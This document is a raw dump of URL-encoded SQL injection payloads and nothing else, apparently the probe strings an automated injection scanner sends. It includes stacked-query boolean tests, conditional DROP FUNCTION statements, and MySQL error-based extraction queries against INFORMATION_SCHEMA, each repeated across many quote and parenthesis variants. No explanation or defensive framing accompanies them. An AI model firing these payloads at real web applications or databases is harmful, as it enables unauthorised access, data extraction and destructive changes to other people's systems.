-2322%27%20WHERE%208382%3D8382%3B%20SELECT%20%28CASE%20WHEN%20%284106%3D4106%29%20THEN%204106%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -6562%27%20WHERE%204148%3D4148%3B%20SELECT%20%28CASE%20WHEN%20%281879%3D5202%29%20THEN%201879%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -5917%22%20WHERE%201818%3D1818%3B%20SELECT%20%28CASE%20WHEN%20%282381%3D5050%29%20THEN%202381%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -8144%22%20WHERE%205841%3D5841%3B%20SELECT%20%28CASE%20WHEN%20%284106%3D4106%29%20THEN%204106%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -2734%22%20WHERE%209974%3D9974%3B%20SELECT%20%28CASE%20WHEN%20%289873%3D9363%29%20THEN%209873%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- 1234.5%29%3B%20IF%288300%3D6865%29%20SELECT%208300%20ELSE%20DROP%20FUNCTION%20zUmp%3B-- 1234.5%29%3B%20IF%284668%3D4668%29%20SELECT%204668%20ELSE%20DROP%20FUNCTION%20YDud%3B-- 1234.5%29%3B%20IF%283985%3D9468%29%20SELECT%203985%20ELSE%20DROP%20FUNCTION%20vszd%3B-- 1234.5%27%29%3B%20IF%284865%3D1818%29%20SELECT%204865%20ELSE%20DROP%20FUNCTION%20ZhfH%3B-- 1234.5%27%29%3B%20IF%284668%3D4668%29%20SELECT%204668%20ELSE%20DROP%20FUNCTION%20YDud%3B-- 1234.5%27%29%3B%20IF%287029%3D2633%29%20SELECT%207029%20ELSE%20DROP%20FUNCTION%20CAhu%3B-- 1234.5%27%3B%20IF%286008%3D7708%29%20SELECT%206008%20ELSE%20DROP%20FUNCTION%20okxd%3B-- 1234.5%27%3B%20IF%284668%3D4668%29%20SELECT%204668%20ELSE%20DROP%20FUNCTION%20YDud%3B-- 1234.5%27%3B%20IF%288989%3D9187%29%20SELECT%208989%20ELSE%20DROP%20FUNCTION%20DTcR%3B-- 1234.5%22%3B%20IF%286076%3D6314%29%20SELECT%206076%20ELSE%20DROP%20FUNCTION%20jRVH%3B-- 1234.5%22%3B%20IF%284668%3D4668%29%20SELECT%204668%20ELSE%20DROP%20FUNCTION%20YDud%3B-- 1234.5%22%3B%20IF%287030%3D1744%29%20SELECT%207030%20ELSE%20DROP%20FUNCTION%20zdDZ%3B-- 1234.5%29%3B%20IF%282212%3D9964%29%20SELECT%202212%20ELSE%20DROP%20FUNCTION%20cNjN%3B--%20AND%20%289007%3D9007 1234.5%29%3B%20IF%284668%3D4668%29%20SELECT%204668%20ELSE%20DROP%20FUNCTION%20YDud%3B--%20AND%20%287441%3D7441 1234.5%29%3B%20IF%286777%3D9962%29%20SELECT%206777%20ELSE%20DROP%20FUNCTION%20Hnvc%3B--%20AND%20%286481%3D6481 1234.5%29%29%3B%20IF%286920%3D3298%29%20SELECT%206920%20ELSE%20DROP%20FUNCTION%20YYBi%3B--%20AND%20%28%285354%3D5354 1234.5%29%29%3B%20IF%284668%3D4668%29%20SELECT%204668%20ELSE%20DROP%20FUNCTION%20YDud%3B--%20AND%20%28%282263%3D2263 1234.5%29%29%3B%20IF%287939%3D2373%29%20SELECT%207939%20ELSE%20DROP%20FUNCTION%20PqjW%3B--%20AND%20%28%288763%3D8763 1234.5%29%29%29%3B%20IF%282287%3D5372%29%20SELECT%202287%20ELSE%20DROP%20FUNCTION%20trIo%3B--%20AND%20%28%28%287035%3D7035 1234.5%29%29%29%3B%20IF%284668%3D4668%29%20SELECT%204668%20ELSE%20DROP%20FUNCTION%20YDud%3B--%20AND%20%28%28%287982%3D7982 1234.5%29%29%29%3B%20IF%281795%3D3489%29%20SELECT%201795%20ELSE%20DROP%20FUNCTION%20OxlI%3B--%20AND%20%28%28%285633%3D5633 1234.5%3B%20IF%281564%3D2568%29%20SELECT%201564%20ELSE%20DROP%20FUNCTION%20vYqS%3B-- 1234.5%3B%20IF%284668%3D4668%29%20SELECT%204668%20ELSE%20DROP%20FUNCTION%20YDud%3B-- 1234.5%3B%20IF%283685%3D9301%29%20SELECT%203685%20ELSE%20DROP%20FUNCTION%20Wkar%3B-- 1234.5%27%29%3B%20IF%286106%3D7522%29%20SELECT%206106%20ELSE%20DROP%20FUNCTION%20kiXk%3B--%20AND%20%28%27pMKq%27%3D%27pMKq 1234.5%27%29%3B%20IF%284668%3D4668%29%20SELECT%204668%20ELSE%20DROP%20FUNCTION%20YDud%3B--%20AND%20%28%27JfPR%27%3D%27JfPR 1234.5%27%29%3B%20IF%283910%3D8321%29%20SELECT%203910%20ELSE%20DROP%20FUNCTION%20MtXN%3B--%20AND%20%28%27BGwJ%27%3D%27BGwJ 1234.5%27%29%29%3B%20IF%283967%3D7819%29%20SELECT%203967%20ELSE%20DROP%20FUNCTION%20kAIv%3B--%20AND%20%28%28%27svjX%27%3D%27svjX 1234.5%27%29%29%3B%20IF%284668%3D4668%29%20SELECT%204668%20ELSE%20DROP%20FUNCTION%20YDud%3B--%20AND%20%28%28%27dZmO%27%3D%27dZmO 1234.5%27%29%29%3B%20IF%287404%3D3976%29%20SELECT%207404%20ELSE%20DROP%20FUNCTION%20MmtZ%3B--%20AND%20%28%28%27Hdol%27%3D%27Hdol 1234.5%27%29%29%29%3B%20IF%288656%3D8361%29%20SELECT%208656%20ELSE%20DROP%20FUNCTION%20kdNq%3B--%20AND%20%28%28%28%27WMfi%27%3D%27WMfi 1234.5%27%29%29%29%3B%20IF%284668%3D4668%29%20SELECT%204668%20ELSE%20DROP%20FUNCTION%20YDud%3B--%20AND%20%28%28%28%27pCwX%27%3D%27pCwX 1234.5%27%29%29%29%3B%20IF%283105%3D1375%29%20SELECT%203105%20ELSE%20DROP%20FUNCTION%20dMeZ%3B--%20AND%20%28%28%28%27xkXi%27%3D%27xkXi 1234.5%27%3B%20IF%287613%3D7045%29%20SELECT%207613%20ELSE%20DROP%20FUNCTION%20wKDn%3B--%20AND%20%27ElVW%27%3D%27ElVW 1234.5%27%3B%20IF%284668%3D4668%29%20SELECT%204668%20ELSE%20DROP%20FUNCTION%20YDud%3B--%20AND%20%27BPPL%27%3D%27BPPL 1234.5%27%3B%20IF%289409%3D8364%29%20SELECT%209409%20ELSE%20DROP%20FUNCTION%20MQLF%3B--%20AND%20%27aOmL%27%3D%27aOmL 1234.5%27%29%3B%20IF%287936%3D1126%29%20SELECT%207936%20ELSE%20DROP%20FUNCTION%20WaQh%3B--%20AND%20%28%27hoge%27%20LIKE%20%27hoge 1234.5%27%29%3B%20IF%284668%3D4668%29%20SELECT%204668%20ELSE%20DROP%20FUNCTION%20YDud%3B--%20AND%20%28%27xDIs%27%20LIKE%20%27xDIs 1234.5%27%29%3B%20IF%286008%3D9818%29%20SELECT%206008%20ELSE%20DROP%20FUNCTION%20wUOt%3B--%20AND%20%28%27JCMq%27%20LIKE%20%27JCMq 1234.5%27%29%29%3B%20IF%281512%3D7484%29%20SELECT%201512%20ELSE%20DROP%20FUNCTION%20HgsO%3B--%20AND%20%28%28%27VihZ%27%20LIKE%20%27VihZ 1234.5%27%29%29%3B%20IF%284668%3D4668%29%20SELECT%204668%20ELSE%20DROP%20FUNCTION%20YDud%3B--%20AND%20%28%28%27KzxY%27%20LIKE%20%27KzxY 1234.5%27%29%29%3B%20IF%285239%3D6830%29%20SELECT%205239%20ELSE%20DROP%20FUNCTION%20gGIx%3B--%20AND%20%28%28%27dzaT%27%20LIKE%20%27dzaT 1234.5%27%29%29%29%3B%20IF%281662%3D3593%29%20SELECT%201662%20ELSE%20DROP%20FUNCTION%20OSpj%3B--%20AND%20%28%28%28%27DsXD%27%20LIKE%20%27DsXD 1234.5%27%29%29%29%3B%20IF%284668%3D4668%29%20SELECT%204668%20ELSE%20DROP%20FUNCTION%20YDud%3B--%20AND%20%28%28%28%27zjCY%27%20LIKE%20%27zjCY 1234.5%27%29%29%29%3B%20IF%287584%3D8236%29%20SELECT%207584%20ELSE%20DROP%20FUNCTION%20hAYy%3B--%20AND%20%28%28%28%27Xzmp%27%20LIKE%20%27Xzmp 1234.5%27%3B%20IF%282771%3D5484%29%20SELECT%202771%20ELSE%20DROP%20FUNCTION%20SZrP%3B--%20AND%20%27wqiG%27%20LIKE%20%27wqiG 1234.5%27%3B%20IF%284668%3D4668%29%20SELECT%204668%20ELSE%20DROP%20FUNCTION%20YDud%3B--%20AND%20%27urll%27%20LIKE%20%27urll 1234.5%27%3B%20IF%284711%3D3087%29%20SELECT%204711%20ELSE%20DROP%20FUNCTION%20JAom%3B--%20AND%20%27bqpP%27%20LIKE%20%27bqpP 1234.5%22%29%3B%20IF%289440%3D6704%29%20SELECT%209440%20ELSE%20DROP%20FUNCTION%20uOjl%3B--%20AND%20%28%22CJHD%22%3D%22CJHD 1234.5%22%29%3B%20IF%284668%3D4668%29%20SELECT%204668%20ELSE%20DROP%20FUNCTION%20YDud%3B--%20AND%20%28%22tQlE%22%3D%22tQlE 1234.5%22%29%3B%20IF%282567%3D4348%29%20SELECT%202567%20ELSE%20DROP%20FUNCTION%20OOBl%3B--%20AND%20%28%22AdYF%22%3D%22AdYF 1234.5%22%29%29%3B%20IF%286984%3D2270%29%20SELECT%206984%20ELSE%20DROP%20FUNCTION%20ZDoJ%3B--%20AND%20%28%28%22dRba%22%3D%22dRba 1234.5%22%29%29%3B%20IF%284668%3D4668%29%20SELECT%204668%20ELSE%20DROP%20FUNCTION%20YDud%3B--%20AND%20%28%28%22qMBw%22%3D%22qMBw 1234.5%22%29%29%3B%20IF%288078%3D4410%29%20SELECT%208078%20ELSE%20DROP%20FUNCTION%20WMiF%3B--%20AND%20%28%28%22aGgU%22%3D%22aGgU 1234.5%22%29%29%29%3B%20IF%284171%3D6673%29%20SELECT%204171%20ELSE%20DROP%20FUNCTION%20VLtK%3B--%20AND%20%28%28%28%22AtNy%22%3D%22AtNy 1234.5%22%29%29%29%3B%20IF%284668%3D4668%29%20SELECT%204668%20ELSE%20DROP%20FUNCTION%20YDud%3B--%20AND%20%28%28%28%22qyyS%22%3D%22qyyS 1234.5%22%29%29%29%3B%20IF%287547%3D2593%29%20SELECT%207547%20ELSE%20DROP%20FUNCTION%20Tfar%3B--%20AND%20%28%28%28%22ySia%22%3D%22ySia 1234.5%22%3B%20IF%285290%3D5901%29%20SELECT%205290%20ELSE%20DROP%20FUNCTION%20rxgJ%3B--%20AND%20%22nZVD%22%3D%22nZVD 1234.5%22%3B%20IF%284668%3D4668%29%20SELECT%204668%20ELSE%20DROP%20FUNCTION%20YDud%3B--%20AND%20%22wKem%22%3D%22wKem 1234.5%22%3B%20IF%282747%3D2755%29%20SELECT%202747%20ELSE%20DROP%20FUNCTION%20Lzkv%3B--%20AND%20%22HrLc%22%3D%22HrLc 1234.5%22%29%3B%20IF%281970%3D5024%29%20SELECT%201970%20ELSE%20DROP%20FUNCTION%20LoEV%3B--%20AND%20%28%22gVXa%22%20LIKE%20%22gVXa 1234.5%22%29%3B%20IF%284668%3D4668%29%20SELECT%204668%20ELSE%20DROP%20FUNCTION%20YDud%3B--%20AND%20%28%22DhpY%22%20LIKE%20%22DhpY 1234.5%22%29%3B%20IF%282453%3D9214%29%20SELECT%202453%20ELSE%20DROP%20FUNCTION%20HmeB%3B--%20AND%20%28%22Qrni%22%20LIKE%20%22Qrni 1234.5%22%29%29%3B%20IF%287361%3D2396%29%20SELECT%207361%20ELSE%20DROP%20FUNCTION%20FPUq%3B--%20AND%20%28%28%22NGBl%22%20LIKE%20%22NGBl 1234.5%22%29%29%3B%20IF%284668%3D4668%29%20SELECT%204668%20ELSE%20DROP%20FUNCTION%20YDud%3B--%20AND%20%28%28%22PVwF%22%20LIKE%20%22PVwF 1234.5%22%29%29%3B%20IF%287255%3D8881%29%20SELECT%207255%20ELSE%20DROP%20FUNCTION%20VCve%3B--%20AND%20%28%28%22IvMC%22%20LIKE%20%22IvMC 1234.5%22%29%29%29%3B%20IF%287894%3D1302%29%20SELECT%207894%20ELSE%20DROP%20FUNCTION%20pNbb%3B--%20AND%20%28%28%28%22TQNW%22%20LIKE%20%22TQNW 1234.5%22%29%29%29%3B%20IF%284668%3D4668%29%20SELECT%204668%20ELSE%20DROP%20FUNCTION%20YDud%3B--%20AND%20%28%28%28%22rGns%22%20LIKE%20%22rGns 1234.5%22%29%29%29%3B%20IF%285598%3D6368%29%20SELECT%205598%20ELSE%20DROP%20FUNCTION%20WJJz%3B--%20AND%20%28%28%28%22ujei%22%20LIKE%20%22ujei 1234.5%22%3B%20IF%281963%3D8673%29%20SELECT%201963%20ELSE%20DROP%20FUNCTION%20hsZI%3B--%20AND%20%22ZdzU%22%20LIKE%20%22ZdzU 1234.5%22%3B%20IF%284668%3D4668%29%20SELECT%204668%20ELSE%20DROP%20FUNCTION%20YDud%3B--%20AND%20%22yjcY%22%20LIKE%20%22yjcY 1234.5%22%3B%20IF%284477%3D2894%29%20SELECT%204477%20ELSE%20DROP%20FUNCTION%20YqQl%3B--%20AND%20%22Xwip%22%20LIKE%20%22Xwip 1234.5%29%20WHERE%204826%3D4826%3B%20IF%284121%3D4736%29%20SELECT%204121%20ELSE%20DROP%20FUNCTION%20wrUD%3B-- 1234.5%29%20WHERE%203613%3D3613%3B%20IF%284668%3D4668%29%20SELECT%204668%20ELSE%20DROP%20FUNCTION%20YDud%3B-- 1234.5%29%20WHERE%202574%3D2574%3B%20IF%281796%3D8262%29%20SELECT%201796%20ELSE%20DROP%20FUNCTION%20SkWP%3B-- 1234.5%27%29%20WHERE%204788%3D4788%3B%20IF%287852%3D8134%29%20SELECT%207852%20ELSE%20DROP%20FUNCTION%20ImbE%3B-- 1234.5%27%29%20WHERE%207901%3D7901%3B%20IF%284668%3D4668%29%20SELECT%204668%20ELSE%20DROP%20FUNCTION%20YDud%3B-- 1234.5%27%29%20WHERE%206486%3D6486%3B%20IF%286463%3D8724%29%20SELECT%206463%20ELSE%20DROP%20FUNCTION%20umFW%3B-- 1234.5%27%20WHERE%205625%3D5625%3B%20IF%285738%3D3381%29%20SELECT%205738%20ELSE%20DROP%20FUNCTION%20YAAB%3B-- 1234.5%27%20WHERE%207232%3D7232%3B%20IF%284668%3D4668%29%20SELECT%204668%20ELSE%20DROP%20FUNCTION%20YDud%3B-- 1234.5%27%20WHERE%209593%3D9593%3B%20IF%288819%3D3035%29%20SELECT%208819%20ELSE%20DROP%20FUNCTION%20skDA%3B-- 1234.5%22%20WHERE%208500%3D8500%3B%20IF%287525%3D1669%29%20SELECT%207525%20ELSE%20DROP%20FUNCTION%20hvdU%3B-- 1234.5%22%20WHERE%202967%3D2967%3B%20IF%284668%3D4668%29%20SELECT%204668%20ELSE%20DROP%20FUNCTION%20YDud%3B-- 1234.5%22%20WHERE%208471%3D8471%3B%20IF%283293%3D6384%29%20SELECT%203293%20ELSE%20DROP%20FUNCTION%20BZsu%3B-- 1234.5%27%20%7C%7C%20%28SELECT%205969%20FROM%20DUAL%20WHERE%203644%3D3644%3B%20IF%287291%3D6238%29%20SELECT%207291%20ELSE%20DROP%20FUNCTION%20EoTB%3B--%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%201506%20FROM%20DUAL%20WHERE%202422%3D2422%3B%20IF%284668%3D4668%29%20SELECT%204668%20ELSE%20DROP%20FUNCTION%20YDud%3B--%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%202754%20FROM%20DUAL%20WHERE%205442%3D5442%3B%20IF%283852%3D3850%29%20SELECT%203852%20ELSE%20DROP%20FUNCTION%20BGeL%3B--%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208867%20WHERE%204253%3D4253%3B%20IF%285485%3D7905%29%20SELECT%205485%20ELSE%20DROP%20FUNCTION%20seMD%3B--%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204532%20WHERE%203205%3D3205%3B%20IF%284668%3D4668%29%20SELECT%204668%20ELSE%20DROP%20FUNCTION%20YDud%3B--%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%209945%20WHERE%202550%3D2550%3B%20IF%286625%3D5931%29%20SELECT%206625%20ELSE%20DROP%20FUNCTION%20CBkq%3B--%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%205242%20FROM%20DUAL%20WHERE%206322%3D6322%3B%20IF%288157%3D9544%29%20SELECT%208157%20ELSE%20DROP%20FUNCTION%20zDDq%3B--%20%29 1234.5%20%2B%20%28SELECT%206806%20FROM%20DUAL%20WHERE%206257%3D6257%3B%20IF%284668%3D4668%29%20SELECT%204668%20ELSE%20DROP%20FUNCTION%20YDud%3B--%20%29 1234.5%20%2B%20%28SELECT%203648%20FROM%20DUAL%20WHERE%203217%3D3217%3B%20IF%282812%3D1177%29%20SELECT%202812%20ELSE%20DROP%20FUNCTION%20lsnr%3B--%20%29 1234.5%20%2B%20%28SELECT%203428%20WHERE%208697%3D8697%3B%20IF%285200%3D7369%29%20SELECT%205200%20ELSE%20DROP%20FUNCTION%20xJra%3B--%20%29 1234.5%20%2B%20%28SELECT%204289%20WHERE%204474%3D4474%3B%20IF%284668%3D4668%29%20SELECT%204668%20ELSE%20DROP%20FUNCTION%20YDud%3B--%20%29 1234.5%20%2B%20%28SELECT%209285%20WHERE%207042%3D7042%3B%20IF%285554%3D5844%29%20SELECT%205554%20ELSE%20DROP%20FUNCTION%20vJQC%3B--%20%29 1234.5%27%20%2B%20%28SELECT%20%27tRxU%27%20FROM%20DUAL%20WHERE%203338%3D3338%3B%20IF%283386%3D8824%29%20SELECT%203386%20ELSE%20DROP%20FUNCTION%20oCLk%3B--%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27nkXy%27%20FROM%20DUAL%20WHERE%202145%3D2145%3B%20IF%284668%3D4668%29%20SELECT%204668%20ELSE%20DROP%20FUNCTION%20YDud%3B--%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27Llhj%27%20FROM%20DUAL%20WHERE%209426%3D9426%3B%20IF%284695%3D2893%29%20SELECT%204695%20ELSE%20DROP%20FUNCTION%20iDVo%3B--%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27CvIs%27%20WHERE%202794%3D2794%3B%20IF%283354%3D9744%29%20SELECT%203354%20ELSE%20DROP%20FUNCTION%20JzvE%3B--%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27Nijc%27%20WHERE%203778%3D3778%3B%20IF%284668%3D4668%29%20SELECT%204668%20ELSE%20DROP%20FUNCTION%20YDud%3B--%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27RaLj%27%20WHERE%205650%3D5650%3B%20IF%281814%3D3271%29%20SELECT%201814%20ELSE%20DROP%20FUNCTION%20aIdE%3B--%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%3B%20IF%289456%3D8027%29%20SELECT%209456%20ELSE%20DROP%20FUNCTION%20Byqx%3B--%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%3B%20IF%284668%3D4668%29%20SELECT%204668%20ELSE%20DROP%20FUNCTION%20YDud%3B--%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%3B%20IF%282547%3D2873%29%20SELECT%202547%20ELSE%20DROP%20FUNCTION%20OFUj%3B--%20%23 1234.5%29%20AND%20%28SELECT%207374%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287374%3D7374%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 1234.5%27%29%20AND%20%28SELECT%207374%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287374%3D7374%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 1234.5%27%20AND%20%28SELECT%207374%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287374%3D7374%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 1234.5%22%20AND%20%28SELECT%207374%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287374%3D7374%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 1234.5%29%20AND%20%28SELECT%207374%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287374%3D7374%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%283660%3D3660 1234.5%29%29%20AND%20%28SELECT%207374%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287374%3D7374%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%286896%3D6896 1234.5%29%29%29%20AND%20%28SELECT%207374%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287374%3D7374%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%287800%3D7800 1234.5%20AND%20%28SELECT%207374%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287374%3D7374%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 1234.5%27%29%20AND%20%28SELECT%207374%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287374%3D7374%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27fobT%27%3D%27fobT 1234.5%27%29%29%20AND%20%28SELECT%207374%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287374%3D7374%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%27UFIv%27%3D%27UFIv 1234.5%27%29%29%29%20AND%20%28SELECT%207374%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287374%3D7374%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%27UqeQ%27%3D%27UqeQ 1234.5%27%20AND%20%28SELECT%207374%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287374%3D7374%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27EXwS%27%3D%27EXwS 1234.5%27%29%20AND%20%28SELECT%207374%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287374%3D7374%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27JgHo%27%20LIKE%20%27JgHo 1234.5%27%29%29%20AND%20%28SELECT%207374%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287374%3D7374%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%27hySy%27%20LIKE%20%27hySy 1234.5%27%29%29%29%20AND%20%28SELECT%207374%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287374%3D7374%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%27SegF%27%20LIKE%20%27SegF 1234.5%27%20AND%20%28SELECT%207374%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287374%3D7374%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27PgWW%27%20LIKE%20%27PgWW 1234.5%22%29%20AND%20%28SELECT%207374%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287374%3D7374%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%22MKvT%22%3D%22MKvT 1234.5%22%29%29%20AND%20%28SELECT%207374%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287374%3D7374%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%22HsRo%22%3D%22HsRo 1234.5%22%29%29%29%20AND%20%28SELECT%207374%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287374%3D7374%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%22BvhT%22%3D%22BvhT 1234.5%22%20AND%20%28SELECT%207374%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287374%3D7374%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%22dEBX%22%3D%22dEBX 1234.5%22%29%20AND%20%28SELECT%207374%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287374%3D7374%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%22xsrz%22%20LIKE%20%22xsrz 1234.5%22%29%29%20AND%20%28SELECT%207374%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287374%3D7374%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%22mgHi%22%20LIKE%20%22mgHi 1234.5%22%29%29%29%20AND%20%28SELECT%207374%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287374%3D7374%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%22Ixxu%22%20LIKE%20%22Ixxu 